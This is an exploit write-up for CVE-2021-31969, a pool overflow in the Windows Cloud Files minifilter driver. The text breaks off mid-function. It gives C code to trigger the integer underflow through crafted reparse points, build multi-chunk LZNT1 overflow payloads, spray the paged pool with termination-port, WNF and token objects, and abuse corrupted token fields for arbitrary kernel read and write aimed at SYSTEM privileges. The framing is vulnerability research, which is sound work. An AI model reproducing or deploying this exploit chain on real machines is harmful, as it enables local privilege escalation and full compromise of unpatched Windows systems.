Introduction

Memory corruption bugs remain prevalent, yet exploiting them keeps getting harder because of stronger defensive mechanisms and the growing complexity of software systems. A basic proof of concept is often enough to get a bug patched, but developing a functional exploit that bypasses existing countermeasures provides valuable insight into the capabilities of advanced threat actors. This is particularly true for the heavily scrutinized driver cldflt.sys, which has received patches every Patch Tuesday since June. It has also become a focal point for threat actors, following the exploits targeting the clfs.sys and afd.sys drivers. In this article, we aim to highlight the significance of cldflt.sys and advocate for more research into this driver and its associated components.

Turning to the specific vulnerability, CVE-2021-31969 initially appears hard to exploit because of how restrictive it is. However, by manipulating the paged pool, it is possible to turn a seemingly isolated pool overflow into a full arbitrary read/write primitive, which is then used to obtain a shell as SYSTEM.

Description

Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability

Affected Versions

  • Windows 10 1809-21H2
  • Windows Server 2019

Patch Diff

OS: Windows 10 1809
Binary: cldflt.sys

Before Patch

Version: KB5003217
Hash: 316016b70cd25ad43a0710016c85930616fe85ebd69350386f6b3d3060ec717e

  v7 = *(_DWORD *)(a1 + 8);
  someSize = HIWORD(v7);
  if ( !_bittest((const int *)&v7, 0xFu) )
  {
    *a3 = a1;
    return (unsigned int)v3;
  }
  allocatedSize = someSize + 8;
  allocatedMem = ExAllocatePoolWithTag(PagedPool, someSize + 8, 'pRsH');
  allocatedMemRef = allocatedMem;
  if ( !allocatedMem )
  {
    LODWORD(v3) = -1073741670;
    goto LABEL_3;
  }
  *(_QWORD *)allocatedMem = *(_QWORD *)a1;
  *((_DWORD *)allocatedMem + 2) = *(_DWORD *)(a1 + 8);
  v3 = (unsigned int)RtlDecompressBuffer(
                       COMPRESSION_FORMAT_LZNT1,
                       (PUCHAR)allocatedMem + 12,// uncompressed_buffer
                       allocatedSize - 12,      // uncompressed_buffer_size
                       (PUCHAR)(a1 + 12),
                       a2 - 12,
                       (PULONG)va);

After Patch

Version: KB5003646
Hash: 5cef11352c3497b881ac0731e6b2ae4aab6add1e3107df92b2da46b2a61089a9

    someSize = *(_WORD *)(a1 + 10);
    if ( someSize >= 4u )
    {
      if ( (*(_DWORD *)(a1 + 8) & 0x8000) == 0 )
      {
        *a3 = a1;
        return (unsigned int)status;
      }
      allocatedSize = someSize + 8;
      allocatedMem = ExAllocatePoolWithTag(PagedPool, allocatedSize, 'pRsH');
      allocatedMemRef = allocatedMem;
      if ( !allocatedMem )
      {
        LODWORD(status) = 0xC000009A;
        goto LABEL_3;
      }
      *(_QWORD *)allocatedMem = *(_QWORD *)a1;
      *((_DWORD *)allocatedMem + 2) = *(_DWORD *)(a1 + 8);
      status = (unsigned int)RtlDecompressBuffer(
                               COMPRESSION_FORMAT_LZNT1,
                               (PUCHAR)allocatedMem + 12,// uncompressed_buffer
                               allocatedSize - 12,// uncompressed_buffer_size
                               (PUCHAR)(a1 + 12),
                               a2 - 12,
                               (PULONG)va);

Bug Analysis

The patch adds a check that someSize is at least 4.

Before the patch, someSize had no lower bound, so allocatedSize (someSize + 8) could be smaller than 12. In that case the UncompressedBufferSize argument passed to RtlDecompressBuffer, allocatedSize - 12, underflows as an unsigned integer and wraps around to a value close to 0xFFFFFFFF (0xFFFFFFFC when someSize is 0).
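The size arithmetic can be reproduced outside the driver. The following is a minimal sketch that only mirrors the expressions visible in the decompiled code above; the function names are hypothetical and it assumes the subtraction is evaluated as an unsigned 32-bit value.

```c
#include <assert.h>
#include <stdint.h>

/* Pre-patch arithmetic: the allocation is someSize + 8 bytes and the
 * decompression size is that value minus 12, as an unsigned 32-bit value. */
uint32_t uncompressed_buffer_size(uint16_t some_size)
{
    uint32_t allocated_size = (uint32_t)some_size + 8u;
    return allocated_size - 12u;   /* wraps when allocated_size < 12 */
}

/* Post-patch guard: sizes below 4 never reach the allocation. */
int patched_size_is_accepted(uint16_t some_size)
{
    return some_size >= 4u;
}

/* Hypothetical usage: the four rejected sizes are exactly the ones that wrap. */
void underflow_example(void)
{
    assert(uncompressed_buffer_size(0) == 0xFFFFFFFCu);
    assert(uncompressed_buffer_size(3) == 0xFFFFFFFFu);
    assert(uncompressed_buffer_size(4) == 0u);
    assert(!patched_size_is_accepted(3) && patched_size_is_accepted(4));
}
```

With the guard in place, the smallest accepted size yields a decompression size of exactly zero, so the subtraction can no longer wrap.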

Based on the LZNT1 Specification, the first WORD in the compressed buffer is a header, which contains metadata such as whether the buffer is compressed and its size.

The compressed data is contained in a single chunk. The chunk header, interpreted as a 16-bit value, is 0xB038. Bit 15 is 1, so the chunk is compressed; bits 14 through 12 are the correct signature value (3); and bits 11 through 0 are decimal 56, so the chunk is 59 bytes in size.

Since the header is user controllable, it is possible to mark the buffer as uncompressed.
This leads to RtlDecompressBuffer behaving like memcpy.
With size and data under user control, a controlled paged-pool overflow is possible.
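To make the header layout concrete, here is a small decoder for the 16-bit LZNT1 chunk header, written from the field description quoted above. It is a sketch rather than the decoder Windows uses, and the type and function names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    int      compressed;   /* bit 15: 1 = compressed, 0 = raw copy */
    unsigned signature;    /* bits 14..12, 3 in a well-formed chunk */
    unsigned chunk_bytes;  /* total chunk size, 2-byte header included */
    unsigned data_bytes;   /* bytes that follow the header */
} Lznt1Header;

Lznt1Header lznt1_decode_header(uint16_t raw)
{
    Lznt1Header h;
    h.compressed  = (raw >> 15) & 1;
    h.signature   = (raw >> 12) & 7u;
    h.chunk_bytes = (raw & 0x0FFFu) + 3u;  /* size field stores size - 3 */
    h.data_bytes  = h.chunk_bytes - 2u;
    return h;
}

/* Hypothetical usage: the specification's example header. */
void lznt1_header_example(void)
{
    Lznt1Header h = lznt1_decode_header(0xB038);
    assert(h.compressed == 1 && h.signature == 3 && h.chunk_bytes == 59);
}
```

Decoding 0x002F with the same function gives an uncompressed chunk with 0x30 data bytes, which is the case where decompression degenerates into a plain copy of attacker-supplied bytes.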

Structures

The variable a1 shown above points to a REPARSE_DATA_BUFFER.

typedef struct _REPARSE_DATA_BUFFER {
  ULONG  ReparseTag;
  USHORT ReparseDataLength;
  USHORT Reserved;
  struct {
    UCHAR DataBuffer[1];
  } GenericReparseBuffer;
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;

GenericReparseBuffer.DataBuffer contains custom data set by the filter driver.

struct cstmData
{
  WORD flag;
  WORD cstmDataSize;
  UCHAR compressedBuffer[1];
};

The first WORD is a flag, followed by a size that influences pool allocation, and finally the compressed buffer passed to RtlDecompressBuffer.

This data is stored in the directory’s reparse point, and is retrieved and decompressed under the conditions described below.

HsmpRpReadBuffer:

v9 = (unsigned int)FltFsControlFile(
                       Instance,
                       FileObject,
                       FSCTL_GET_REPARSE_POINT,
                       0i64,
                       0,
                       reparseData,
                       0x4000u,
                       0i64);

...

status = HsmpRpiDecompressBuffer(reparseData, reparseDataSize, someOut);

Triggering Bug

On a fresh copy of Windows 10 1809, the minifilter is not attached to any drives by default.

Registration is required to attach it.

HRESULT RegisterAndConnectSyncRoot(LPCWSTR Path, CF_CONNECTION_KEY *Key)
{
    HRESULT                  status = S_OK;
    CF_SYNC_REGISTRATION     reg = { sizeof(CF_SYNC_REGISTRATION) };
    CF_SYNC_POLICIES         pol = { sizeof(CF_SYNC_POLICIES) };
    CF_CALLBACK_REGISTRATION table[1] = { CF_CALLBACK_REGISTRATION_END };

    reg.ProviderName = L"HackProvider";
    reg.ProviderVersion = L"99";

    pol.Hydration.Primary = CF_HYDRATION_POLICY_FULL;
    pol.Population.Primary = CF_POPULATION_POLICY_FULL;
    pol.PlaceholderManagement = CF_PLACEHOLDER_MANAGEMENT_POLICY_CONVERT_TO_UNRESTRICTED;

    if ((status = CfRegisterSyncRoot(Path, &reg, &pol, 0)) == S_OK)
        status = CfConnectSyncRoot(Path, table, 0, CF_CONNECT_FLAG_NONE, Key);

    return status;
}

Now it will respond to filesystem actions through its registered pre/post op handlers.

By profiling the handlers and tracing with proximity view, we can find some paths that may trigger the decompression. Operations such as converting a file to a placeholder, obtaining (creating) a file handle, or renaming a file can lead to decompression.

As an example, this is the callstack when obtaining a handle to a file inside a syncroot directory:

4: kd> k
 # Child-SP          RetAddr               Call Site
00 ffff8689`7915cf78 fffff807`5505722b     cldflt!HsmpRpiDecompressBuffer
01 ffff8689`7915cf80 fffff807`5503e4b2     cldflt!HsmpRpReadBuffer+0x267
02 ffff8689`7915cff0 fffff807`5505fd29     cldflt!HsmpSetupContexts+0x27a
03 ffff8689`7915d120 fffff807`5505fea9     cldflt!HsmiFltPostECPCREATE+0x47d
04 ffff8689`7915d1c0 fffff807`52a3442e     cldflt!HsmFltPostCREATE+0x9
05 ffff8689`7915d1f0 fffff807`52a33cf3     FLTMGR!FltpPerformPostCallbacks+0x32e
14: kd> dt _FILE_OBJECT @rdx
ntdll!_FILE_OBJECT
   +0x000 Type             : 0n5
   +0x002 Size             : 0n216
   +0x008 DeviceObject     : 0xffff8687`c43a8c00 _DEVICE_OBJECT
   +0x010 Vpb              : 0xffff8687`c43f69a0 _VPB
   +0x018 FsContext        : 0xffff9985`38f8e6f0 Void
   +0x020 FsContext2       : 0xffff9985`36ff4a00 Void
   +0x028 SectionObjectPointer : (null) 
   +0x030 PrivateCacheMap  : (null) 
   +0x038 FinalStatus      : 0n0
   +0x040 RelatedFileObject : (null) 
   +0x048 LockOperation    : 0 ''
   +0x049 DeletePending    : 0 ''
   +0x04a ReadAccess       : 0x1 ''
   +0x04b WriteAccess      : 0 ''
   +0x04c DeleteAccess     : 0 ''
   +0x04d SharedRead       : 0x1 ''
   +0x04e SharedWrite      : 0x1 ''
   +0x04f SharedDelete     : 0x1 ''
   +0x050 Flags            : 0x40002
   +0x058 FileName         : _UNICODE_STRING "\Windows\Temp\hax\vuln"
   +0x068 CurrentByteOffset : _LARGE_INTEGER 0x0
   +0x070 Waiters          : 0
   +0x074 Busy             : 1
   +0x078 LastLock         : (null) 
   +0x080 Lock             : _KEVENT
   +0x098 Event            : _KEVENT
   +0x0b0 CompletionContext : (null) 
   +0x0b8 IrpListLock      : 0
   +0x0c0 IrpList          : _LIST_ENTRY [ 0xffff8e85`b1dc0910 - 0xffff8e85`b1dc0910 ]
   +0x0d0 FileObjectExtension : (null) 

This means we can write arbitrary reparse data into a created directory inside syncroot and obtain a handle to it in order to trigger the pool overflow.

CreateDirectoryW(OverwriteDir, NULL);

hOverwrite = CreateFileW(
        OverwriteDir,
        GENERIC_ALL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_BACKUP_SEMANTICS,
        NULL
    );

status = DeviceIoControl(
        hOverwrite,
        FSCTL_SET_REPARSE_POINT_EX,
        newReparseData,
        newSize,
        NULL,
        0,
        &returned,
        NULL
    );

CloseHandle(hOverwrite);

// Trigger Bug
hOverwrite = CreateFileW(
        OverwriteDir,
        GENERIC_ALL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_BACKUP_SEMANTICS,
        NULL
    );

FSCTL_SET_REPARSE_POINT_EX is used because the driver registered a pre-op handler for FSCTL_SET_REPARSE_POINT which denies our request.

if ( v2->Parameters.FileSystemControl.Buffered.InputBufferLength >= 4
    && (Context && (*(_DWORD *)(*((_QWORD *)Context + 2) + 0x1Ci64) & 1) != 0
     || (*(_DWORD *)v2->Parameters.FileSystemControl.Buffered.SystemBuffer & 0xFFFF0FFF) == dword_1E4F0) )
  {
    if ( Context )
    {
      v3 = *((_QWORD *)Context + 2);
      v4 = *(_QWORD *)(*(_QWORD *)(v3 + 16) + 32i64);
    }
    HsmDbgBreakOnStatus(0xC000CF18);
    if ( WPP_GLOBAL_Control != (PDEVICE_OBJECT)&WPP_GLOBAL_Control
      && (HIDWORD(WPP_GLOBAL_Control->Timer) & 1) != 0
      && BYTE1(WPP_GLOBAL_Control->Timer) >= 2u )
    {
      WPP_SF_qqqd(
        WPP_GLOBAL_Control->AttachedDevice,
        17i64,
        &WPP_7c63b6f3d9f33043309d9f605c648752_Traceguids,
        Context,
        v3,
        v4,
        0xC000CF18);
    }
    a1->IoStatus.Information = 0i64;
    v7 = 4;
    a1->IoStatus.Status = 0xC000CF18;
  }

The check lies in (*(_DWORD *)(*((_QWORD *)Context + 2) + 0x1Ci64) & 1) != 0.
Context is not under user control, hence this call will always fail.

As mentioned above, we can control the compressed buffer contents to make RtlDecompressBuffer behave like memcpy.

    // controlled size, controlled content overflow!
    *(WORD *)&payload[0] = 0x8000; // pass flag check
    *(WORD *)&payload[2] = 0x0; // size to trigger underflow
    *(WORD *)&payload[4] = 0x30-1; // lznt1 header: uncompressed, 0x30 size
    memset(&payload[6], 'B', 0x100);

This specific reparse buffer leads to a 0x20 sized allocation in the paged pool.

1: kd> !pool @rax
Pool page ffff9f0ab3547090 region is Paged pool
 ffff9f0ab3547000 size:   60 previous size:    0  (Free)       ....
 ffff9f0ab3547060 size:   20 previous size:    0  (Allocated)  Via2
*ffff9f0ab3547080 size:   20 previous size:    0  (Allocated) *HsRp
		Owning component : Unknown (update pooltag.txt)
 ffff9f0ab35470a0 size:   20 previous size:    0  (Allocated)  Ntfo
 ffff9f0ab35470c0 size:   20 previous size:    0  (Allocated)  ObNm
 ffff9f0ab35470e0 size:   20 previous size:    0  (Allocated)  PsJb
 ffff9f0ab3547100 size:   20 previous size:    0  (Allocated)  VdPN
 ffff9f0ab3547120 size:   20 previous size:    0  (Allocated)  Via2

However, the crafted LZNT1 header causes 0x30 'B' bytes to be copied starting at offset 0xC of a pool allocation that can only hold 0x10 bytes of user data. This overflows the allocation by 0x2C bytes, corrupting neighbouring chunks and eventually causing a BSOD.

4: kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x0000007e
                       (0xFFFFFFFFC0000005,0xFFFFF804044ED09A,0xFFFFDA8F76595748,0xFFFFDA8F76594F90)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

The content and size of overflow is fully under our control, whereas the allocated chunk is fixed at 0x20 bytes.
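The overflow length follows directly from the copy offset, the copy length, and the usable size of the chunk. A minimal sketch of that arithmetic, with a hypothetical helper name:

```c
#include <assert.h>
#include <stddef.h>

/* Bytes written past the end of a buffer when copy_len bytes are copied to
 * buffer + copy_offset and only `usable` bytes belong to the buffer. */
size_t overflow_bytes(size_t copy_offset, size_t copy_len, size_t usable)
{
    size_t end = copy_offset + copy_len;
    return end > usable ? end - usable : 0;
}

/* Hypothetical usage with the numbers from the crash above: the copy starts
 * at offset 0xC, is 0x30 bytes long, and the chunk holds 0x10 bytes. */
void overflow_example(void)
{
    assert(overflow_bytes(0xC, 0x30, 0x10) == 0x2C);
}
```

Only the second argument changes with the crafted chunk header, which is why the overflow length is attacker-controlled while the chunk size is not.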

Restrictions

We only get one chance to overflow, so ideally we want to corrupt an object that gives us both read and write.

On modern Windows, pool allocations smaller than 0x200 bytes are managed by the Low Fragmentation Heap (LFH) if it’s active. For common sizes like 0x20, the LFH bucket is undoubtedly activated by the time the exploit starts. Under the LFH, the vulnerable chunk will only be positioned adjacent to other 0x20 sized chunks in the same bucket, which rules out the easy route of overflowing into an adjacent powerful object like WNF to improve the primitive. Furthermore, finding a 0x20 sized object that provides both arbitrary read and write is difficult, because a 0x20 sized allocation can only really hold 0x10 bytes of data.

Improving Primitive

Before proceeding with exploitation, it’s important to fully understand the primitive at hand. For an overflow, that involves exploring its maximum possible size.

Although it may seem like the maximum size we can specify in the LZNT1 header is only 0xFFF, that’s only for one compressed chunk.

typedef struct
{
    WORD Size;
    BYTE Data[4096];
} LZNT1Chunk;

Each structure above describes a page-sized chunk.
By allocating multiple structures, we can write up to 0xFFFFFFFF bytes with RtlDecompressBuffer.

void CreatePayload(PBYTE *CreatedPayload)
{
    WORD       *payload = NULL;
    LZNT1Chunk *buf = NULL;
    DWORD      remaining = OVERFLOW_SIZE;
    DWORD      pagesToOverflow = 0;
    DWORD      effectiveSize = 0;

    pagesToOverflow = (remaining % PAGE_SIZE) ? (remaining / PAGE_SIZE) + 1 : (remaining / PAGE_SIZE);

    payload = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(LZNT1Chunk) * pagesToOverflow + 4); // metadata
    if (!payload) {
        printf("[-] HeapAlloc fail: 0x%08X\n", GetLastError());
        return;
    }

    payload[0] = 0x8000; // pass flag check
    payload[1] = 0; // trigger integer underflow

    buf = (LZNT1Chunk *)((PBYTE)payload + 4); // chunks start after the 4-byte flag/size header

    for (int i = 0; i < pagesToOverflow; i++) {
        if (remaining >= PAGE_SIZE)
            buf[i].Size = PAGE_SIZE - 1;
        else
            buf[i].Size = remaining - 1;

        effectiveSize = buf[i].Size + 1;
        for (int j = 0; j < effectiveSize / sizeof(DWORD); j++)
            ((DWORD *)(&buf[i].Data))[j] = PAGE_SIZE; // spray 0x1000 values

        remaining -= PAGE_SIZE;
    }

    *CreatedPayload = (PBYTE)payload;
    return;
}

However, recall that the HsmpRpReadBuffer function only retrieves up to 0x4000 bytes of reparse data, including headers. This leaves us with a maximum of less than 4 pages to overflow.
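The "less than 4 pages" figure can be checked with a short calculation. The sketch below assumes the layout described earlier: 12 bytes of headers precede the compressed data (the driver passes a1 + 12 and a2 - 12 to RtlDecompressBuffer), and each uncompressed chunk costs a 2-byte header for at most 4096 data bytes. The helper name and macros are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define LZNT1_CHUNK_HEADER 2u      /* 16-bit chunk header */
#define LZNT1_CHUNK_DATA   4096u   /* maximum data bytes per chunk */

/* Largest number of raw data bytes that fits in the reparse buffer. */
size_t max_uncompressed_bytes(size_t reparse_limit, size_t header_bytes)
{
    assert(reparse_limit >= header_bytes);
    size_t room = reparse_limit - header_bytes;
    size_t full = room / (LZNT1_CHUNK_HEADER + LZNT1_CHUNK_DATA);
    size_t left = room % (LZNT1_CHUNK_HEADER + LZNT1_CHUNK_DATA);
    /* A trailing partial chunk still needs its own 2-byte header. */
    size_t tail = left > LZNT1_CHUNK_HEADER ? left - LZNT1_CHUNK_HEADER : 0;
    return full * LZNT1_CHUNK_DATA + tail;
}
```

Under these assumptions, max_uncompressed_bytes(0x4000, 12) evaluates to 16364 bytes: three full chunks plus a 4076-byte tail, which is 20 bytes short of four pages.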

Exploitation Thoughts

The only logical way is still to overflow into an object that grants us more control, which is probably of another size. With about 4 pages of data to write, maybe we can write past the LFH completely? Maybe into another subsegment?

By allocating a large amount of 0x20 chunks in the paged pool, we get to exhaust all currently available 0x20 LFH buckets. When that happens, the backend allocator allocates a new segment for some new LFH buckets.

At the same time, we allocate a large amount of _WNF_STATE_DATA and _TOKEN objects adjacent to each other in the same page. This will hopefully exhaust all currently available VS subsegments, forcing the frontend allocator to allocate new VS subsegments.

Different subsegment types (LFH/VS) can be contiguous in pool memory. This means that if we’re lucky (and spray enough), we can end up with an LFH bucket adjacent to a VS subsegment in memory.

If there are fewer than 4 pages of LFH buckets between the victim chunk and a VS subsegment, we can overflow into the VS subsegment and gain control over the WNF and TOKEN objects residing there.

The overflow data will consist of DWORDs with value 0x1000. The goal is to overwrite _WNF_STATE_DATA->AllocatedSize and _WNF_STATE_DATA->DataSize with 0x1000, giving us a relative page read/write primitive which we’ll use to manipulate the _TOKEN object right after it.
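The reason for spraying a single repeated DWORD is that the exact distance to the target object is unknown, so every 4-byte slot must carry an acceptable value. The sketch below models this on a stand-in structure. The 0x10-byte layout of ModelWnfStateData is an assumption based on commonly published symbol dumps of _WNF_STATE_DATA, not something shown in this article, and the initial header values are placeholders.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Assumed layout of the _WNF_STATE_DATA header (0x10 bytes). */
typedef struct {
    uint16_t NodeTypeCode;
    uint16_t NodeByteSize;
    uint32_t AllocatedSize;
    uint32_t DataSize;
    uint32_t ChangeStamp;
} ModelWnfStateData;

/* Fill a DWORD-aligned region with one repeated 32-bit value. */
void spray_dwords(void *dst, size_t bytes, uint32_t value)
{
    assert(bytes % sizeof(uint32_t) == 0);
    uint8_t *p = dst;
    for (size_t off = 0; off < bytes; off += sizeof(uint32_t))
        memcpy(p + off, &value, sizeof(value));
}

/* Model of a header after the overflow has passed over it. */
ModelWnfStateData model_overwritten_header(uint32_t original_size)
{
    ModelWnfStateData d = { 0, 0, original_size, original_size, 1 };
    spray_dwords(&d, sizeof(d), 0x1000);
    return d;
}
```

In this model both size fields end up as 0x1000 regardless of where the header sits, as long as it is DWORD-aligned relative to the start of the overflow. The other header fields are overwritten with the same value as a side effect.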

LFH Pool Spray

There exists an object named _TERMINATION_PORT that leads to a 0x20 sized allocation and can be freely allocated.

//0x10 bytes (sizeof)
struct _TERMINATION_PORT
{
    struct _TERMINATION_PORT* Next;                                         //0x0
    VOID* Port;                                                             //0x8
}; 

By invoking NtRegisterThreadTerminatePort with an ALPC(LPC) Port object, we can allocate an instance of _TERMINATION_PORT in the paged pool.

void SprayTerminationPort(DWORD *Count)
{
    ALPC_PORT_ATTRIBUTES    alpcAttr = { 0 };
    OBJECT_ATTRIBUTES       objAttr = { 0 };
    HANDLE                  hConnPort = NULL;
    UNICODE_STRING          uPortName = { 0 };
    NTSTATUS                status = STATUS_SUCCESS;

    RtlInitUnicodeString(&uPortName, L"\\RPC Control\\My ALPC Test Port");
    InitializeObjectAttributes(&objAttr, &uPortName, 0, NULL, NULL);
    
    alpcAttr.MaxMessageLength = AlpcMaxAllowedMessageLength();

    status = NtAlpcCreatePort(&hConnPort, &objAttr, &alpcAttr);
    if (!NT_SUCCESS(status)) {
        printf("[-] NtAlpcCreatePort Error: 0x%08X\n", status);
        return;
    }

    for (int i = 0; i < *Count; i++)
        NtRegisterThreadTerminatePort(hConnPort);

    printf("[+] Sprayed 0x%lx _TERMINATION_PORT objects\n", *Count);

    g_TerminationPortSprayDone = 1;
    while (!g_FreeTerminationPortObjects)
        Sleep(1500);

    return;
}

This object is linked to the current thread’s _ETHREAD object and is freed when the thread terminates.

Post Overflow

All steps to perform a controlled overflow are detailed above. Assuming we have successfully overflowed into a VS subsegment, what are the next steps?

It’s a good sign if the OS hasn’t crashed by the time we finish overflowing. It at least means we did not write into unmapped memory. By querying all WNF chunks, we can find chunks that are successfully overwritten.

int WnfFindUsableCorruptedChunk(DWORD WnfObjectSize)
{
    WNF_CHANGE_STAMP stamp = 0;
    BYTE             buf[PAGE_SIZE];
    DWORD            bufSize = WnfObjectSize;
    DWORD            wnfToTokenOffset = WnfObjectSize + 0x50;
    NTSTATUS         status = STATUS_SUCCESS;

    for (int i = 0; i < g_WnfCount; i++) {
        status = NtQueryWnfStateData(&g_Statenames[i], NULL, NULL, &stamp, &buf, &bufSize);
        bufSize = WnfObjectSize;
        if (status != STATUS_BUFFER_TOO_SMALL)
            continue;
        
        printf("[*] Found corrupted chunk: 0x%lx\n", i);
        bufSize = PAGE_SIZE;
        status = NtQueryWnfStateData(&g_Statenames[i], NULL, NULL, &stamp, &buf, &bufSize);
        if (!NT_SUCCESS(status)) {
            puts("something weird");
            printf("0x%08X\n", status);
            continue;
        }

        if (*(DWORD *)((ULONG64)buf + wnfToTokenOffset) == 0x1000)
            continue;

        printf("[*] Found usable chunk: 0x%lx\n", i);
        return i;
    }

    return -1;
}

First, perform a query using the DataSize that was originally allocated. Objects that were not overflowed respond without error, but objects whose DataSize was enlarged to 0x1000 return STATUS_BUFFER_TOO_SMALL.

Now we check if we are able to use this object for exploitation.
The criterion is an untouched _TOKEN object after it.

To identify the target _TOKEN object by its handle, we can allocate two arrays prior to spraying to store all handles and IDs.

BOOL TokenAllocateObject(void)
{
    BOOL             status = TRUE;
    HANDLE           hOriginal = NULL;
    DWORD            returnLen = 0;
    TOKEN_STATISTICS stats = { 0 };

    status = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hOriginal);
    if (!status) {
        printf("[-] OpenProcessToken fail: 0x%08x\n", GetLastError());
        hOriginal = NULL;
        goto out;
    }

    // Allocates a _TOKEN object in kernel pool
    status = DuplicateTokenEx(hOriginal, MAXIMUM_ALLOWED, NULL, SECURITY_ANONYMOUS, TokenPrimary, &g_Tokens[g_TokenCount]);
    if (!status) {
        printf("[-] DuplicateTokenEx fail: 0x%08x\n", GetLastError());
        status = FALSE;
        goto out;
    }

    status = GetTokenInformation(g_Tokens[g_TokenCount], TokenStatistics, &stats, sizeof(TOKEN_STATISTICS), &returnLen);
    if (!status) {
        printf("[-] GetTokenInformation fail: 0x%08x\n", GetLastError());
        status = FALSE;
        goto out;
    }

    g_TokenIds[g_TokenCount] = stats.TokenId.LowPart; // High part is always 0

    g_TokenCount++;

out:
    if (hOriginal)
        CloseHandle(hOriginal);

    return status;
}

Relative read with WNF allows us to extract the TokenId member in pool memory and identify its corresponding handle.
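Mapping a leaked TokenId back to a handle is then a plain array lookup, since the handle and ID arrays are filled in lockstep. A minimal sketch, using a hypothetical helper and plain integer types in place of the Windows ones:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the index whose recorded TokenId matches the leaked one, or -1.
 * The same index selects the matching handle in the parallel handle array. */
int find_token_index(const uint32_t *token_ids, size_t count, uint32_t leaked_id)
{
    assert(token_ids != NULL || count == 0);
    for (size_t i = 0; i < count; i++)
        if (token_ids[i] == leaked_id)
            return (int)i;
    return -1;
}
```

A result of -1 would mean the leaked value did not come from one of the sprayed tokens, in which case the corrupted WNF chunk should be treated as unusable.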

Arbitrary Read/Write

The _TOKEN object contains many pointers we can modify to gain arbitrary read/write using Win32 APIs.

Arbitrary Read

NtQueryInformationToken:

case TokenBnoIsolation:
        }
        if ( Token->BnoIsolationHandlesEntry )
        {
          *((_BYTE *)TokenInformation + 8) = 1;
          *(_QWORD *)TokenInformation = (char *)TokenInformation + 16;
          memmove(
            (char *)TokenInformation + 16,
            Token->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.Buffer,
            Token->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.MaximumLength);
        }

By setting Token->BnoIsolationHandlesEntry to a usermode buffer, we can forge fields for EntryDescriptor.IsolationPrefix.Buffer and EntryDescriptor.IsolationPrefix.MaximumLength.
The data will be copied to TokenInformation + 16, which is another usermode buffer we supply to the API.

Arbitrary Write

NtSetInformationToken:

This function calls into SepAppendDefaultDacl if we specify TokenDefaultDacl as the TokenInformationClass.

void *__fastcall SepAppendDefaultDacl(_TOKEN *Token, unsigned __int16 *UserBuffer)
{
  int v3; // edi
  _ACL *v4; // rbx
  void *result; // rax

  v3 = UserBuffer[1];
  v4 = (_ACL *)&Token->DynamicPart[*(unsigned __int8 *)(Token->PrimaryGroup + 1) + 2];
  result = memmove(v4, UserBuffer, UserBuffer[1]);
  Token->DynamicAvailable -= v3;
  Token->DefaultDacl = v4;
  return result;
}

By pointing Token->PrimaryGroup to one byte before memory that contains a null, we can make *(unsigned __int8 *)(Token->PrimaryGroup + 1) + 2 equal to 2.
We can’t make it 0 because it’s an unsigned byte operation zero-extended to 64-bits, as shown by the assembly:

movzx   r8d, byte ptr [rax+1]
mov     rax, [rcx+0B0h]
add     rax, 8
lea     rbx, [rax+r8*4]

Then we can set DynamicPart to arbitrary address - 0x8 and gain arbitrary write.
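The destination address can be written as a small formula taken from the assembly above: DynamicPart plus 8, plus four times the byte read from PrimaryGroup + 1. The sketch below only restates that arithmetic; the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Destination of the memmove in SepAppendDefaultDacl, per the assembly:
 *   add rax, 8 ; lea rbx, [rax + r8*4]                                  */
uint64_t default_dacl_destination(uint64_t dynamic_part, uint8_t count_byte)
{
    return dynamic_part + 8u + (uint64_t)count_byte * 4u;
}

/* DynamicPart value that makes the write land on `target`, assuming the
 * byte at PrimaryGroup + 1 is zero. */
uint64_t dynamic_part_for_target(uint64_t target)
{
    assert(target >= 8u);
    return target - 8u;
}
```

Because the byte is zero-extended, the offset added to DynamicPart ranges from 8 to 8 + 4 * 255, and it can never be negative or zero.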

There’s a catch though.
DynamicPart and PrimaryGroup should point to the same address, otherwise there will be an unwanted memmove corrupting memory.

SepFreeDefaultDacl:

  DynamicPart = TokenObject->DynamicPart;
  PrimaryGroup = (unsigned __int8 *)TokenObject->PrimaryGroup;
  if ( DynamicPart != (unsigned int *)PrimaryGroup )
  {
    memmove(DynamicPart, PrimaryGroup, 4i64 * PrimaryGroup[1] + 8);
    result = (__int64)TokenObject->DynamicPart;
    TokenObject->PrimaryGroup = result;
  }

To make things more restrictive, UserBuffer[1] used as size field must also be at least 0x8, which means the size field will clobber two bytes of the write destination.

UserBuffer is also cast to an ACL and has to pass ACL checks.

//0x8 bytes (sizeof)
struct _ACL
{
    UCHAR AclRevision;                                                      //0x0
    UCHAR Sbz1;                                                             //0x1
    USHORT AclSize;                                                         //0x2
    USHORT AceCount;                                                        //0x4
    USHORT Sbz2;                                                            //0x6
}; 

That restricts the value of the AclRevision member between 2 and 4.

if ( (unsigned __int8)(Acl->AclRevision - 2) <= 2u )

AceCount should also be 0 to bypass further checks.
The final buffer written should look like this:

0x2   0x0    0x8    0x0    0x0     0x0     0x0      0x0
Rev   Sbz1   Sz-1   Sz-2   Cnt-1   Cnt-2   Sbz2-1   Sbz2-2
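The same eight bytes can be built and checked in code. This is a sketch with hypothetical names: it reproduces the revision check shown above and the byte layout of the table, with AclSize being the 16-bit value that the decompiled code reads as UserBuffer[1].

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

typedef struct { uint8_t bytes[8]; } FakeAcl;

/* Same test as the decompiled check: revision must be 2, 3 or 4. */
int acl_revision_ok(uint8_t revision)
{
    return (uint8_t)(revision - 2) <= 2u;
}

FakeAcl build_fake_acl(void)
{
    FakeAcl acl;
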